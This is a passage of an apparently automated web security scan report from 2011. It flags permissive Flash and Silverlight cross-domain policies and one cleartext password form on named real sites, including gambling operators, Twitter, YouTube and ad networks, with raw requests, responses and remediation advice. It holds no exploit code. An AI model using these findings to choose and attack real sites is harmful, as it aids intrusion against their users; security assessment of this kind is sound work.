Set-Cookie: ASP.NET_SessionId=0kkc2r55aswcclrmbmi2u1vy; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.129. http://www.primegrattage.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.primegrattage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.primegrattage.com

Response

HTTP/1.1 200 OK
Content-Length: 282
Content-Type: text/xml
Last-Modified: Mon, 04 Apr 2011 11:36:37 GMT
Accept-Ranges: bytes
ETag: "f640a48ebcf2cb1:357c"
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CUR OUR PUB NOR UNI CNT"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:00:34 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*.primegrattage.com"/>
...[SNIP]...

4.130. http://www.primescratchcards.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.primescratchcards.com

Response

HTTP/1.1 200 OK
Content-Length: 286
Content-Type: text/xml
Last-Modified: Thu, 31 Dec 2009 01:34:45 GMT
Accept-Ranges: bytes
ETag: "daca8c6eb989ca1:357c"
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:40:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*.primescratchcards.com"/>
...[SNIP]...

4.131. http://www.scratch2cash.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:42:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=b0n2oe2sqagbhdjjwok3aibu; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.132. http://www.scratchcardheaven.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:41:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fmhath45oq5kbhmig5dtx23g; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.133. http://www.svenskalotter.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.svenskalotter.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:41:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bxsmxwfaspjxf155faojjpub; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.134. http://www.youtube.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:46 GMT
Server: Apache
Last-Modified: Fri, 13 May 2011 03:51:08 GMT
ETag: "132-4a320373f0300"
Accept-Ranges: bytes
Content-Length: 306
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

4.135. http://api.twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:37 GMT
Server: hi
Status: 200 OK
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Content-Type: application/xml
Content-Length: 561
Set-Cookie: k=173.193.214.243.1305550177246264; path=/; expires=Mon, 23-May-11 12:49:37 GMT; domain=.twitter.com
Cache-Control: max-age=1800
Expires: Mon, 16 May 2011 13:19:37 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.136. https://casino.betsson.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://casino.betsson.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: casino.betsson.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml
Expires: Tue, 17 May 2011 03:41:40 GMT
Last-Modified: Thu, 07 Apr 2011 10:52:45 GMT
Accept-Ranges: bytes
ETag: "1CBF511ED057C80"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:14:16 GMT
Connection: close
Content-Length: 461

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-po
...[SNIP]...
<allow-access-from domain="cdn.betsson.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="betsson.hs.llnwd.net"/>
<allow-access-from domain="ble.hs.llnwd.net"/>
<allow-access-from domain="ble-cdn.betsson.com"/>
...[SNIP]...

4.137. https://games.betsson.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://games.betsson.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: games.betsson.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml
Expires: Tue, 17 May 2011 03:48:30 GMT
Last-Modified: Tue, 25 Jan 2011 13:39:02 GMT
Accept-Ranges: bytes
ETag: "1CBBC953A08DF00"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:34:50 GMT
Connection: close
Content-Length: 633

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-po
...[SNIP]...
<allow-access-from domain="s-cdn.betsson.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="t-cdn.betsson.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="cdn.betsson.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="betsson.hs.llnwd.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="ble.hs.llnwd.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="ble-cdn.betsson.com" secure="true"/>
...[SNIP]...

4.138. https://livecasino.betsson.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://livecasino.betsson.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: livecasino.betsson.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml
Expires: Tue, 17 May 2011 03:30:39 GMT
Last-Modified: Tue, 08 Feb 2011 12:00:55 GMT
Accept-Ranges: bytes
ETag: "1CBC787D6E47580"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:10:22 GMT
Connection: close
Content-Length: 456

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-
...[SNIP]...
<allow-access-from domain="cdn.betsson.com"/>
<allow-access-from domain="betsson.hs.llnwd.net"/>
<allow-access-from domain="ble.hs.llnwd.net"/>
<allow-access-from domain="ble-cdn.betsson.com"/>
...[SNIP]...

4.139. http://members.bet365.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.bet365.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: members.bet365.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Mon, 16 May 2011 11:41:02 GMT
X-Powered-By: ASP.NET
Content-Length: 469
Content-Type: text/html
Cache-control: private


<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFileHttps.xsd
...[SNIP]...
<allow-access-from domain="www.bet365.com" to-ports="443,80" secure="false" />
...[SNIP]...

4.140. https://members.bet365.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://members.bet365.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: members.bet365.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Mon, 16 May 2011 12:34:11 GMT
X-Powered-By: ASP.NET
Content-Length: 469
Content-Type: text/html
Cache-control: private


<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFileHttps.xsd
...[SNIP]...
<allow-access-from domain="www.bet365.com" to-ports="443,80" secure="false" />
...[SNIP]...

4.141. https://poker.betsson.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://poker.betsson.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: poker.betsson.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml
Expires: Tue, 17 May 2011 03:46:34 GMT
Last-Modified: Wed, 16 Feb 2011 11:20:42 GMT
Accept-Ranges: bytes
ETag: "1CBCDCB8BEFE100"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:13:28 GMT
Connection: close
Content-Length: 548

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-po
...[SNIP]...
<allow-access-from domain="cdn.betsson.com"/>
<allow-access-from domain="betsson.hs.llnwd.net"/>
<allow-access-from domain="s-cdn.betsson.com"/>
<allow-access-from domain="t-cdn.betsson.com"/>
<allow-access-from domain="ble.hs.llnwd.net"/>
<allow-access-from domain="ble-cdn.betsson.com"/>
...[SNIP]...

4.142. https://scratch.betsson.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: scratch.betsson.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml
Expires: Tue, 17 May 2011 04:03:14 GMT
Last-Modified: Mon, 14 Feb 2011 10:54:04 GMT
Accept-Ranges: bytes
ETag: "1CBCC357EA0EE00"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:45:03 GMT
Connection: close
Content-Length: 343

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-po
...[SNIP]...
<allow-access-from domain="ble.hs.llnwd.net"/>
<allow-access-from domain="ble-cdn.betsson.com"/>
...[SNIP]...

4.143. http://twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1305547124759243; path=/; expires=Mon, 23-May-11 11:58:44 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Mon, 16 May 2011 12:28:44 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.144. https://www.norskelodd.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.norskelodd.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml
Expires: Tue, 17 May 2011 08:39:44 GMT
Last-Modified: Tue, 23 Nov 2010 15:48:12 GMT
Accept-Ranges: bytes
ETag: "1CB8B25D55EC600"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:43:14 GMT
Connection: close
Content-Length: 394

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-po
...[SNIP]...
<allow-access-from domain="ws-cdn.ble.local"/>
<allow-access-from domain="ble.hs.llnwd.net"/>
<allow-access-from domain="www.norgesloddet.com"/>
...[SNIP]...

5. Silverlight cross-domain policy
There are 6 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 15:50:56 GMT
Date: Mon, 16 May 2011 11:41:05 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Mon, 16 May 2011 12:49:31 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 17 May 2011 12:49:29 GMT
Date: Mon, 16 May 2011 12:49:29 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.4. http://s0.2mdn.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 15 May 2011 12:20:21 GMT
Expires: Sun, 15 May 2011 12:12:17 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 86106
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.5. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:30 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 23 May 2011 12:49:30 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

5.6. http://spe.atdmt.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Sat, 21 May 2011 05:45:10 GMT
Date: Mon, 16 May 2011 12:52:12 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6. Cleartext submission of password
There are 20 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://affiliates.interwetten.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://affiliates.interwetten.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: affiliates.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
